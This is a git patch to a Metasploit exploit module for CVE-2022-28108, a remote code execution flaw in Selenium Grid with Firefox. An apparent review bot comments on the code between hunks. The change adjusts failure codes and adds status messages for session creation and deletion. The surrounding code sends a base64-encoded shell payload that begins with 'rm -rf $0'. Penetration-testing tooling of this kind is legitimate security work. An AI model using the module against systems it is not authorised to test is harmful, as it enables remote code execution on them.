From ec8dba87fbea942eddcc404d598f1341fcbf567a Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Thu, 2 Jan 2025 11:30:03 +0900
Subject: [PATCH] Update failure and print about session id
---
 .../selenium_greed_firefox_rce_cve_2022_28108.rb | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
index 01c3eedc78..32183846a2 100644
--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -138,10 +138,12 @@ class MetasploitModule < Msf::Exploit::Remote
 'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
 'data' => new_session
 }, datastore['TIMEOUT'])
- fail_with(Failure::Unreachable, 'Connection failed.') unless res
+ fail_with(Failure::Unknown, 'Connection failed.') unless res
 session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
- fail_with(Failure::Unreachable, 'Failed to start session.') unless session_id
+ fail_with(Failure::Unknown, 'Failed to start session.') unless session_id
+
+ print_status("Started session (#{session_id}).")
 b64encoded_payload = Rex::Text.encode_base64(
 "rm -rf $0\n"\
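Review bot: The `session_id` lookup between the two changed `fail_with` lines indexes `['value']['sessionId']` directly, so a reply whose JSON has no `value` object would presumably raise NoMethodError on nil before the `|| res.get_json_document['sessionId']` fallback or the 'Failed to start session.' check can run. Parsing once and using `dig` keeps both reply shapes working and lets the failure be reported cleanly: `json = res.get_json_document` followed by `session_id = json.dig('value', 'sessionId') || json['sessionId']`. A reply that parses but carries no session id would also read more precisely as `Failure::UnexpectedReply` than `Failure::Unknown`. The enclosing method starts before this hunk and continues past it.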
@@ -161,12 +163,18 @@ class MetasploitModule < Msf::Exploit::Remote
 })
 # The server does not send a response, so no check here
- send_request_cgi({
+ res = send_request_cgi({
 'method' => 'DELETE',
 'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),
 'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }
 })
- # The server does not send a response, so no check here
+ if res
+ print_status("Deleted session (#{session_id}).")
+ else
+ print_status("Failed to delete the session (#{session_id}). "\
+ 'You may need to wait for the session to expire (default: 5 minutes) or '\
+ 'manually delete the session for the next exploit to succeed.')
+ end
 end
 end
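Review bot: The new `if res` branch treats any reply to the DELETE as success, so "Deleted session" is printed even when the server answers with an error status and the session is still registered. Checking the status makes the message trustworthy, for example `if res&.code == 200`, with other replies falling through to the failure text. That failure text asks the operator to clean up by hand, so `print_warning` fits it better than `print_status`. The enclosing method begins before this hunk.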